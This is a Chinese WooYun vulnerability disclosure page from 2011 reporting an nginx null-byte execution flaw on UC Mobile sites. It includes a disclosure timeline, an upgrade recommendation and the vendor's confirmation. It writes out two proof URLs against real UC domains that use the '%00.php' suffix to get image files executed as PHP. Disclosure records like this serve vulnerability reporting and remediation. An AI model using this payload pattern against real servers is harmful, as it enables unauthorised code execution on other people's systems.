当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-02742

漏洞标题:UC Ngnix空字节执行

相关厂商:UC Mobile

漏洞作者: popok

提交时间:2011-08-27 22:10

修复时间:2011-09-26 22:11

公开时间:2011-09-26 22:11

漏洞类型:命令执行

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2011-08-27: 细节已通知厂商并且等待厂商处理中
2011-09-01: 厂商已经确认,细节仅向厂商公开
2011-09-11: 细节向核心白帽子及相关领域专家公开
2011-09-21: 细节向普通白帽子公开
2011-10-01: 细节向实习白帽子公开
2011-09-26: 细节向公众公开

简要描述:

详细说明:

http://my.uc.cn/images/mydisk_sample.jpg%00.php
http://bbs.uc.cn/images/default/logo.gif%00.php
幸亏bbs图片目录设置过权限,不然就被捅菊花了

漏洞证明:

Server: nginx/0.7.62
Date: Sat, 27 Aug 2011 14:08:28 GMT
Content-Type: text/html
................

修复方案:

随便一找就2个站,看了下,uc的nginx版本都很低,赶紧抽空升级一下呗!!

版权声明:转载请注明来源 popok@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2011-09-01 10:11

厂商回复:

感谢提醒,已经联系相关人员进行修复,谢谢!

最新状态:

暂无